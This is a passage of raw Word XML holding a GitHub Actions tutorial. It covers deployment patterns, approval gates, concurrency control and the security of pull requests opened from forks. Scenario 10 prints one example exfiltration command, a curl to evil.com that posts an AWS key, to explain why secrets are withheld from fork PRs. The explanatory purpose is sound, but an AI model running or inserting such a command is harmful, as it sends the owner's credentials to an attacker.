        <w:t xml:space="preserve">. Every real pipeline is a combination of these twelve patterns. Learn them and you'll find you never have to start a new workflow from a blank page — you'll just remix patterns you already know.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 1 — Release tag deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">When you create a tag, the workflow deploys.</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git tag v1.0.0</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git push origin v1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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tags: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'v*'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Pushing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">v1.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> triggers the deploy. Most teams use this for production — it's a clean, controlled trigger that doesn't fire on every commit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 2 — Sequential execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="847725"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="scenario-02-sequential.png" descr="scenario-02-sequential.png" title="scenario-02-sequent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47725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Task B only runs after Task A succeeds. Build → Test → Deploy.</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test</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spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Strict order. Each stage waits for the previous one to finish successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 3 — Parallel execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3752850"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="scenario-03-parallel.png" descr="scenario-03-parallel.png" title="scenario-03-parall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52850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple jobs at once. The default behavior.</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backend-test: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frontend-test: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api-test:</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spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">needs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> anywhere, so all three run simultaneously. Faster feedback, more runner minutes burned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 4 — Mixed (sequential then parallel then sequential)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="2695575"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="scenario-04-mixed.png" descr="scenario-04-mixed.png" title="scenario-04-mix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95575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The shape of most real pipelines. Build once, fan out to parallel work, then converge on a final step.</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service-a:</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service-b:</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service-c:</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final-check:</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[service-a, service-b, service-c]</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spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Visually:</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service-a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build →     → service-b →     → final-check</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service-c →</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The final job declares all three services in its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">needs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> array, so it waits for all of them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 5 — Microservices deployment (the real-world question)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">People ask: should I deploy microservices one at a time, or in parallel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The answer is: it depends on dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Case A — services are independent.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy in parallel. Much faster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Case B — service B depends on service A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sequential. Run A first, then B.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The trap is forcing everything into a chain just because it feels "safer." It's not safer, it's slower. And if your services are truly decoupled, they shouldn't need to be deployed in lockstep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 6 — Staged rollout (v5.1 → v5.2 → v5.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Controlled version rollout, also known as a canary release. Each step verifies health before the next one starts.</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deploy v5.1 → check</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deploy v5.2 → check</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deploy v5.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful when blast radius matters — rolling a new version to one tenant group at a time, for example, so you can bail out after the first group if something goes wrong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 7 — Environment-based deployment with approval gates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="781050"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="scenario-07-environments.png" descr="scenario-07-environments.png" title="scenario-07-environ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81050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Promote one build through dev → staging → production, with a human approval before prod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub has a feature called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Environments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Settings → Environments). Each environment can require reviewers. When a job references that environment, the job pauses until someone clicks Approve.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deploy-dev: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environment: dev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./deploy.sh dev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deploy-staging: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deploy-dev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environment: staging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./deploy.sh staging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deploy-prod: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deploy-staging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environment: production      # configured with required reviewers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./deploy.sh production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Environments can also hold environment-scoped secrets — a different API key per stage — so your staging key can't accidentally deploy to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 8 — Monorepo / path-filtered builds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">In a repo holding multiple projects, you don't want changes to the docs folder triggering the full backend test suite.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'backend/**'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'.github/workflows/backend.yml'</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pull_request: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paths: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'backend/**'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This workflow only runs when files under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or the workflow file itself) change. Pair one such workflow per project and each stays independent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need finer control inside a single workflow (say, different jobs for different paths), use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">dorny/paths-filter@v3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preser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changes: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outputs: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backend: ${{ steps.filter.outputs.backend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frontend: ${{ steps.filter.outputs.frontend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dorny/paths-filter@v3</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id: filter</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filters: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backend: 'backend/**'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frontend: 'frontend/**'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backend-test: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needs: changes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needs.changes.outputs.backend ==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 [...]</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Scenario 9 — Concurrency control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Two deploys racing is a classic way to break an environment. One line fixes it:</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concurrency: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group: deploy-${{ github.ref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cancel-in-progress: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./deploy.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">All runs that compute the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> string line up. With </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">cancel-in-progress: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, a newer run kills the older one. For production deploys where cancelling mid-flight is dangerous, set it to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — newer runs wait instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 10 — Fork PR security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The rule: when a contributor opens a PR from their fork, GitHub strips access to your secrets. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is also read-only. This is deliberate — you don't want a random PR running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">curl evil.com -d "$AWS_KEY"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">There are two related events that behave very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Event</w:t>
            </w:r>
          </w:p>
        </w:tc>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Runs on</w:t>
            </w:r>
          </w:p>
        </w:tc>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Has secrets?</w:t>
            </w:r>
          </w:p>
        </w:tc>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Checks out</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pull_request</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Forked PR code</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No (external forks)</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The PR branch</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pull_request_target</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Base branch code</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Yes</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The base branch by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The safe pattern: use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">pull_request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for tests (no secrets needed). Never check out PR code inside a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
